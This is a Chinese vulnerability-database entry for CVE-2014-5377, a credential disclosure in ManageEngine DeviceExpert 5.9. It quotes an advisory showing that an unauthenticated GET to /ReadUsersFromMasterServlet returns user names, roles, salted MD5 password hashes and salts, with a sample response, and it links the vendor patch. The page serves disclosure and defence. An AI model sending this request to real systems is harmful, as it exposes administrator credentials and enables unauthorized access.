ManageEngine DeviceExpert 5.9 - User Credential Disclosure

基本字段

漏洞编号:
SSV-87212
披露/发现时间:
2014-08-20
提交时间:
2014-09-04
漏洞等级:
漏洞类别:
信息泄漏
影响组件:
ManageEngine DeviceExpert
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
CVE-2014-5377
CNNVD-ID:
CNNVD-201408-511
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
>> User credential disclosure in ManageEngine DeviceExpert 5.9
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
>> Background on the affected product:
"DeviceExpert is a webbased, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management."
>> Technical details:
Vulnerability: User credential disclosure / CVE-2014-5377
Constraints: no authentication or any other information needed.
Affected versions: UNFIXED as of 27/08/2014 - current version 5.9 build 5980 is vulnerable, older versions likely vulnerable
GET /ReadUsersFromMasterServlet
Example response:
<?xml version="1.0" encoding="UTF-8"?><discoveryresult><discoverydata><username>admin</username><userrole>Administrator</userrole><password>Ok6/FqR5WtJY5UCLrnvjQQ==</password><emailid>noreply@zohocorp.com</emailid><saltvalue>12345678</saltvalue></discoverydata></discoveryresult>
The passwords are a salted MD5 hash.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 5 兑换

参考链接

解决方案

临时解决方案

官方解决方案

目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: http://www.manageengine.com/products/device-expert/release-notes.html

防护方案

人气 1194
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负